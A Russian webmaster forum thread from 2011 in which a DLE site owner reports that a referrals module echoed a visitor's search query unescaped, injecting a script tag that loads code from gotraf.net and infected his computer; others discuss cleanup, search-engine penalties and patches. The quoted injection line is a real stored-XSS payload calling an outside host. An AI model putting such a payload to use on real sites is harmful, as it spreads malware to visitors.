Как я словил вирус на комп от своего сайта
Страницы: 1
Как я словил вирус на комп от своего сайта
Открыл я вчера в IE свой сайт, и IE спросил у меня разрешение на запуск скрипта со стороннего сайта. Перерыл в (просмотр html-кода) все скрипты на странице, и нашёл в выводе модуля переходы (у меня dle) такую строку
Код
» <a href="/">g<sc ript src=http://gotraf.net/in.php?id=234></script></a><br />
Как я понял, кто то перешёл на мой сайт по запросу g<sc ript src=http://gotraf.net/in.php?id=234></script>. Пока пытался понять либо сайт пытаются взломать либо вирус внедрить, уже всплыло окно, сообщающее мне, что я должен денег. Что то типа за то, что распостранял порнуху. Нод 32 с последними базами отмолчался в этот момент. Ну вирусняк то стандартный, правда всё равно день на него убил, но напрягает эта уязвимость. И потом, если бот ПС в такой момент на сайт заглянет, ведь сайт в распостранении вирусов обвинят. И чё делать? модуль убирать или может какие его доработки существуют? Вобщем, если кто сталкивался, отпишитесь, буду признателен.
Изменено: daden11 - 12 Июля 2011 17:56

Бесплатная контекстная реклама

У меня тоже такое было, всё почистил. Но вот как избавиться от етой уязвимости?
А что вы там почистили? у меня траф небольшой, но минут за 10 само ушло (показываются 5 последних переходов).
Изменено: daden11 - 12 Июля 2011 22:37
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html
Блин, накаркал. Яша заметил эту шляпу,
Рисунок

и трафик сразу вниз пошёл (на картинке пользователи онлайн)
Рисунок

в ВМ появилось предупреждение о вирусе с кнопкой перепроверить. Написано,что перепроверка идёт пару дней. Вылезу ли из этого дерьма без потерь или нет, время покажет. Короче, думаю, что всё это происки конкурентов.
Изменено: daden11 - 13 Июля 2011 16:34
Цитата
daden11 пишет:
А что вы там почистили? у меня траф небольшой, но минут за 10 само ушло (показываются 5 последних переходов).

Нужно через поиск у админ-панели у настройке етого модуля найти переход с етим запросом и удалить его. После етого у меня антивирус перестал выдавать сообщение о заражённом сайте.
Цитата
daden11 пишет:
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html

Не понимаю какая польза от етого фикса, ведь он в коде заменяет ети знаки "{" и "}", а их у вредоносном коде нету.
Цитата
daden11 пишет:
И чё делать? модуль убирать

Яша за него уже наказывае... smile:)
Цитата
maxim maxim пишет:
Цитата
daden11 пишет:
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html

Не понимаю какая польза от етого фикса, ведь он в коде заменяет ети знаки "{" и "}", а их у вредоносном коде нету.

я ещё нашёл исправления от автора модуля _http://dle-solutions.ru/dle/bags/150-nedostatochnaya-filtraciya-v-module-perehody.html там вроде корректно.
Цитата
Arte пишет:
Яша за него уже наказывае..

я вывод модуля переходы сделал сразу за topnews, и в коде он отображается так же как и topnews. Не думаю, что ПС его определят
Цитата
daden11 пишет:
я ещё нашёл исправления от автора модуля _http://dle-solutions.ru/dle/bags/150-nedostatochnaya-filtraciya-v-module-perehody.html там вроде корректно.

Вот за ето спасибо smile:D
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
00:20 Редирект ссылка и анкоры точная наука или философия 
23:06 Настройка smtp 
22:21 Выдача Яндекс. Стремятся ребята к качественной выдаче. Как это понимать? 
22:05 Profitco - гемблинговая ПП! Проверенные бренды, парк-домены, выплаты каждую неделю, геолокация по ip 
21:41 Шаблон для фотографа 
20:37 Добавление в Яндекс Каталог 
20:06 Внешняя оптимизация – основные правила закупки ссылок 
00:37 Парсинг сайтов с поиска 
00:31 аккаунт adwords 
00:13 Вакансии: Операторы и редакторы по обработке статей из вебархива 
23:40 Бесплатный SEO-Аудит. Получи 3 полных отчета по сайту! 
23:40 20 крутых ссылок всего за 499 рублей! Из них 14 сайтов в ЯК, 6 в DMOZ, средний ТИЦ 225. Только ручное размещение! 
20:29 Создание и доработка сайтов 
20:26 Статейное продвижение ваших сайтов 
00:15 Создать несколько сайтов 
23:58 Chat Wars - первая MMORPG в Telegram 
23:40 Китайцы создали способного за секунду заменить журналистов робота 
23:24 что может быть с сайтом? 
23:22 Москвичу отказали в работе из-за шести друзей во "ВКонтакте" 
22:49 Стоит ли покупать ссылку с Wikipedia ? 
22:46 "Лаборатория Касперского" выявила вредные привычки россиян в отношении паролей